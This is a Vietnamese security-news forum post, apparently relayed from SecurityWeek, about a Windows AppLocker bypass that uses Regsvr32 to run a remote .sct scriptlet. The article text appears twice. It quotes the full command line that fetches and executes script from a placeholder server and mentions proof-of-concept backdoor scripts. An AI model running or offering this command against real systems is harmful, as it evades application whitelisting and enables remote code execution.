WhiteHat News #ID:2112
VIP Members
-
16/06/2015
-
83
-
672 bài viết
Windows AppLocker có thể bị vượt qua để thực thi script từ xa
Windows AppLocker của Microsoft, tính năng an ninh trong Windows 7 có nhiệm vụ xác định những người dùng có thể chạy ứng dụng trong phạm vi một tổ chức, có thể bị vượt qua để thực thi script từ xa trên máy tính.
Khi AppLocker được đưa vào Windows 7 và Windows Server 2008 R2, quản trị hệ thống có thể thiết lập các quy định cho phép hoặc từ chối chạy ứng dụng. Những quy định này có thể được áp dụng cho người dùng hoặc nhóm người dùng cụ thể và có thể được sử dụng cho các tập tin thực thi (.exe và .com), các script (.js, .ps1, .vbs, cmd, và .bat), tập tin Windows Installer (.msi và .msp), và tập tin DLL (.dll và .ocx).
Để có thể vượt qua Windows AppLocker, tin tặc phải kiểm soát được vị trí nào đó trên máy tính mục tiêu và phải sử dụng Regsvr32, tiện ích dòng lệnh được thiết kế cho việc đăng ký DLL trong registry, theo nhà nghiên cứu an ninh Casey Smith.
Nhà nghiên cứu phát hiện cách tốt nhất để vượt qua AppLocker là đặt khối script vào bên trong thẻ Registration và sau đó sử dụng Regsvr32 để thực thi mã. Theo Smith, đoạn mã trong thẻ đăng ký thực thi việc đăng ký (register) và hủy bỏ (unregister).
Lợi dụng Regsvr32 để thực thi script mang lại rất nhiều lợi ích, vì công cụ dòng lệnh này là proxy nhận thức, sử dụng TLS, làm theo các chuyển hướng, và cũng có thể được thiết lập để chạy ngầm và không hiển thị bất kỳ thông báo nào.
“Vì vậy, tất cả những gì bạn cần làm là lưu tập tin .sct tại vị trí mà bạn kiểm soát. Từ mục tiêu, chỉ cần thực thi lệnh regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. Để kích hoạt việc vượt qua, đặt khối mã, VB hoặc JS bên trong thẻ ”.
Nhà nghiên cứu cho biết, việc vượt qua cũng có thể được sử dụng để gọi một tập tin cục bộ, và việc thực thi script từ thẻ registration không thực sự đăng ký đối tượng COM, có nghĩa là sẽ không có gì xuất hiện trong registry. Nhà nghiên cứu đã tạo ra một tập hợp các script proof-of-concept có thể được tải về qua Regsvr32 để mở một backdoor hoặc một shell trên HTTP.
Có trong cả Windows 10, AppLocker được coi là một trong những tính năng an ninh quan trọng nhất trong nền tảng này. Theo Microsoft, AppLocker là một trong những tính năng của Windows 10 cung cấp các giải pháp giảm thiểu tương đương (hoặc tốt hơn) EMET (Enhanced Mitigation Experience Toolkit).
Đây không phải là lần đầu tiên tiện ích Regsvr32 được phát hiện cho phép kẻ xâm nhập khả năng thực hiện các hành vi bất chính trên máy tính mục tiêu. Trong năm 2014, Trojan ngân hàng Neverquest cũng lợi dụng tiện ích này để thực hiện module DLL của mình.
Theo SecurityWeek
Khi AppLocker được đưa vào Windows 7 và Windows Server 2008 R2, quản trị hệ thống có thể thiết lập các quy định cho phép hoặc từ chối chạy ứng dụng. Những quy định này có thể được áp dụng cho người dùng hoặc nhóm người dùng cụ thể và có thể được sử dụng cho các tập tin thực thi (.exe và .com), các script (.js, .ps1, .vbs, cmd, và .bat), tập tin Windows Installer (.msi và .msp), và tập tin DLL (.dll và .ocx).
Để có thể vượt qua Windows AppLocker, tin tặc phải kiểm soát được vị trí nào đó trên máy tính mục tiêu và phải sử dụng Regsvr32, tiện ích dòng lệnh được thiết kế cho việc đăng ký DLL trong registry, theo nhà nghiên cứu an ninh Casey Smith.
Nhà nghiên cứu phát hiện cách tốt nhất để vượt qua AppLocker là đặt khối script vào bên trong thẻ Registration và sau đó sử dụng Regsvr32 để thực thi mã. Theo Smith, đoạn mã trong thẻ đăng ký thực thi việc đăng ký (register) và hủy bỏ (unregister).
Lợi dụng Regsvr32 để thực thi script mang lại rất nhiều lợi ích, vì công cụ dòng lệnh này là proxy nhận thức, sử dụng TLS, làm theo các chuyển hướng, và cũng có thể được thiết lập để chạy ngầm và không hiển thị bất kỳ thông báo nào.
“Vì vậy, tất cả những gì bạn cần làm là lưu tập tin .sct tại vị trí mà bạn kiểm soát. Từ mục tiêu, chỉ cần thực thi lệnh regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll. Để kích hoạt việc vượt qua, đặt khối mã, VB hoặc JS bên trong thẻ ”.
Nhà nghiên cứu cho biết, việc vượt qua cũng có thể được sử dụng để gọi một tập tin cục bộ, và việc thực thi script từ thẻ registration không thực sự đăng ký đối tượng COM, có nghĩa là sẽ không có gì xuất hiện trong registry. Nhà nghiên cứu đã tạo ra một tập hợp các script proof-of-concept có thể được tải về qua Regsvr32 để mở một backdoor hoặc một shell trên HTTP.
Có trong cả Windows 10, AppLocker được coi là một trong những tính năng an ninh quan trọng nhất trong nền tảng này. Theo Microsoft, AppLocker là một trong những tính năng của Windows 10 cung cấp các giải pháp giảm thiểu tương đương (hoặc tốt hơn) EMET (Enhanced Mitigation Experience Toolkit).
Đây không phải là lần đầu tiên tiện ích Regsvr32 được phát hiện cho phép kẻ xâm nhập khả năng thực hiện các hành vi bất chính trên máy tính mục tiêu. Trong năm 2014, Trojan ngân hàng Neverquest cũng lợi dụng tiện ích này để thực hiện module DLL của mình.
Theo SecurityWeek